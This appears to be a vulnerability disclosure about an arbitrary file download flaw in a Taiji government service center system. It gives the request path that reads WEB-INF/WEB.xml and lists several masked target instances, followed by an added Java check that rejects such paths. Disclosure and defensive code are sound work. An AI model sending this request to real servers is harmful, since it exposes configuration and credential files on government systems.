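### Brief description:
### Details:
Shenzhen Taiji Software Co., Ltd. (深圳太极软件有限公司) has developed quite a few systems. This one is a government service center system, and it has an arbitrary file download vulnerability. There are so many cases of this system that I don't need to say more.
Arbitrary file download: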
```
/servlet/fileOpenforms?filename=/WEB-INF/WEB.xml
```
Case:
```
http://**.**.**.**//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml
http://**.**.**.**//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml
**.**.**.**/servlet/fileOpenforms?filename=/WEB-INF/WEB.xml
http://**.**.**.**/servlet/fileOpenforms?filename=/WEB-INF/WEB.xml
http://**.**.**.**:8088/servlet/fileOpenforms?filename=/WEB-INF/WEB.xml
http://**.**.**.**//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml
http://**.**.**.**/servlet/fileOpenforms?filename=/WEB-INF/WEB.xml
http://**.**.**.**//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml
http://**.**.**.**:8080//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml
**.**.**.**:8080//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml
**.**.**.**//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml
**.**.**.**//servlet/fileOpenforms?filename=/WEB-INF/WEB.xml
..... and so on
```
### Proof of vulnerability:
Security Testing:
1.

[![01.png](https://images.seebug.org/upload/201507/1417125079996340254f54aca1296bb2f859aeb3.png)](https://images.seebug.org/upload/201507/1417125079996340254f54aca1296bb2f859aeb3.png)

2. Some can also be read directly

[![02.png](https://images.seebug.org/upload/201507/14171257278c26a1b837143bc9671743c7748152.png)](https://images.seebug.org/upload/201507/14171257278c26a1b837143bc9671743c7748152.png)
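A server-side check that would reject the `filename` value shown in this report, as an added example: it is not the vendor's code, and the page does not show the servlet's source. The class name `SafeDownloadResolver`, the base directory `/srv/app/downloads` and the sample inputs are assumptions made for illustration.

```java
import java.nio.file.*;
import java.util.Locale;
import java.util.Optional;

public class SafeDownloadResolver {
    // Hypothetical directory that is the only place downloads may come from.
    private final Path baseDir;
    public SafeDownloadResolver(Path baseDir) {
        this.baseDir = baseDir.toAbsolutePath().normalize();
    }

    /** Returns the file to serve, or empty if the request must be rejected. */
    public Optional<Path> resolve(String filename) {
        if (filename == null || filename.isEmpty() || filename.indexOf('\0') >= 0) {
            return Optional.empty();
        }
        // Treat the parameter as relative: strip leading separators so
        // "/WEB-INF/WEB.xml" cannot be interpreted as an absolute path.
        String relative = filename.replace('\\', '/').replaceAll("^/+", "");
        Path candidate;
        try {
            candidate = baseDir.resolve(relative).normalize();
        } catch (InvalidPathException e) {
            return Optional.empty();
        }
        // After normalization the path must still be inside baseDir ("../" escapes fail here).
        if (!candidate.startsWith(baseDir) || candidate.equals(baseDir)) {
            return Optional.empty();
        }
        // Defence in depth: never serve container-private directories, matched
        // case-insensitively because some file systems ignore case.
        for (Path part : baseDir.relativize(candidate)) {
            String name = part.toString().toUpperCase(Locale.ROOT);
            if (name.equals("WEB-INF") || name.equals("META-INF")) {
                return Optional.empty();
            }
        }
        return Optional.of(candidate);
    }

    public static void main(String[] args) {
        SafeDownloadResolver r = new SafeDownloadResolver(Paths.get("/srv/app/downloads"));
        // Constructed sample inputs; the first is the value from the report above.
        String[] samples = {"/WEB-INF/WEB.xml", "../WEB-INF/web.xml", "forms/apply.doc", "forms/../../etc/passwd"};
        for (String s : samples) {
            System.out.println(s + " -> " + r.resolve(s).map(Path::toString).orElse("REJECTED"));
        }
    }
}
```

The check is lexical only; if the download directory can contain symbolic links, compare `toRealPath()` results before opening the file.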